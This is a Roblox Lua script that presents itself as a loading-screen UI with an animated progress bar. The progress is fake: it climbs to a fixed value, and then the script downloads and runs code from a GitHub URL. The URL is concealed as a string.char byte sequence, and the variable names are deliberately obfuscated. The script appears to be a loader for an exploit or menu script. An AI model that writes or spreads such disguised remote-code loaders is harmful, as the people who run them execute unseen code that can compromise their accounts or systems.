-- Obfuscated Loading UI - Working Version
local a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z=game:GetService("Players"),game:GetService("TweenService"),game:GetService("RunService"),game:GetService("Players").LocalPlayer,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil
d=a.LocalPlayer;e=d:WaitForChild("PlayerGui")
f=Instance.new("ScreenGui")f.Name="LoadingUI"f.Parent=e;f.ResetOnSpawn=false
g=Instance.new("Frame")g.Size=UDim2.new(1,0,1,0)g.Position=UDim2.new(0,0,0,0)g.BackgroundColor3=Color3.fromRGB(0,0,0)g.BackgroundTransparency=0.3;g.Parent=f
h=Instance.new("Frame")h.Size=UDim2.new(0,400,0,80)h.Position=UDim2.new(0.5,-200,0.5,-40)h.BackgroundTransparency=1;h.Parent=g
i=Instance.new("Frame")i.Size=UDim2.new(1,-40,0,40)i.Position=UDim2.new(0,20,0,20)i.BackgroundColor3=Color3.fromRGB(70,70,70)i.BorderSizePixel=0;i.Parent=h
j=Instance.new("UICorner")j.CornerRadius=UDim.new(0,20)j.Parent=i
k=Instance.new("Frame")k.Size=UDim2.new(1,-6,1,-6)k.Position=UDim2.new(0,3,0,3)k.BackgroundColor3=Color3.fromRGB(40,40,40)k.BorderSizePixel=0;k.Parent=i
l=Instance.new("UICorner")l.CornerRadius=UDim.new(0,17)l.Parent=k
m=Instance.new("Frame")m.Size=UDim2.new(0,0,1,-4)m.Position=UDim2.new(0,2,0,2)m.BackgroundColor3=Color3.fromRGB(0,162,255)m.BorderSizePixel=0;m.Parent=k
n=Instance.new("UICorner")n.CornerRadius=UDim.new(0,15)n.Parent=m
o=Instance.new("UIGradient")o.Color=ColorSequence.new{ColorSequenceKeypoint.new(0.0,Color3.fromRGB(0,200,255)),ColorSequenceKeypoint.new(0.5,Color3.fromRGB(100,220,255)),ColorSequenceKeypoint.new(1.0,Color3.fromRGB(0,162,255))}o.Rotation=45;o.Parent=m
p=Instance.new("Frame")p.Size=UDim2.new(0.3,0,1,0)p.Position=UDim2.new(-0.3,0,0,0)p.BackgroundColor3=Color3.fromRGB(255,255,255)p.BackgroundTransparency=0.7;p.BorderSizePixel=0;p.Parent=m
q=Instance.new("UICorner")q.CornerRadius=UDim.new(0,15)q.Parent=p
r=Instance.new("UIGradient")r.Color=ColorSequence.new{ColorSequenceKeypoint.new(0.0,Color3.fromRGB(255,255,255)),ColorSequenceKeypoint.new(0.5,Color3.fromRGB(255,255,255)),ColorSequenceKeypoint.new(1.0,Color3.fromRGB(255,255,255))}r.Transparency=NumberSequence.new{NumberSequenceKeypoint.new(0.0,1),NumberSequenceKeypoint.new(0.5,0.3),NumberSequenceKeypoint.new(1.0,1)}r.Parent=p
s=Instance.new("TextLabel")s.Size=UDim2.new(0,80,0,30)s.Position=UDim2.new(1,-90,0,5)s.BackgroundTransparency=1;s.Text="0%"s.TextColor3=Color3.fromRGB(255,255,255)s.TextScaled=true;s.Font=Enum.Font.GothamBold;s.Parent=i
local function _A()for _=1,15 do local __=Instance.new("Frame")__.Size=UDim2.new(0,8,1,0)__.Position=UDim2.new(0,_*24-12,0,0)__.BackgroundColor3=Color3.fromRGB(255,255,255)__.BackgroundTransparency=0.8;__.BorderSizePixel=0;__.Rotation=-30;__.Parent=m end end
local function _B(___)local ____=UDim2.new(___/100,-4,1,-4)local _____=b:Create(m,TweenInfo.new(0.3,Enum.EasingStyle.Quart,Enum.EasingDirection.Out),{Size=____})local ______=b:Create(s,TweenInfo.new(0.2,Enum.EasingStyle.Linear),{Text=math.floor(___).."%%"})_____:Play()______:Play()end
local function _C()local _______=b:Create(p,TweenInfo.new(1.5,Enum.EasingStyle.Linear,Enum.EasingDirection.InOut,-1),{Position=UDim2.new(1,0,0,0)})_______:Play()return _______ end
_A()local ________=_C()local _________=0;local __________=67
local function _D()local ___________
___________=c.Heartbeat:Connect(function()if _________<__________ then _________=_________+math.random(1,3)*0.5;if _________>__________ then _________=__________ end;_B(_________)end;if _________>=__________ then ___________:Disconnect()wait(1)local ____________=b:Create(m,TweenInfo.new(0.5,Enum.EasingStyle.Quart),{Size=UDim2.new(1,-4,1,-4)})local _____________=b:Create(s,TweenInfo.new(0.3,Enum.EasingStyle.Linear),{Text="100%"})____________:Play()_____________:Play()____________.Completed:Connect(function()wait(0.5)local ______________=b:Create(g,TweenInfo.new(0.5,Enum.EasingStyle.Quart),{BackgroundTransparency=1})______________:Play()______________.Completed:Connect(function()loadstring(game:HttpGet(string.char(104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,83,100,100,110,105,110,47,77,101,110,117,45,72,117,98,47,114,101,102,115,47,104,101,97,100,115,47,109,97,105,110,47,75,101,121)))()f:Destroy()end)end)end end)end;_D()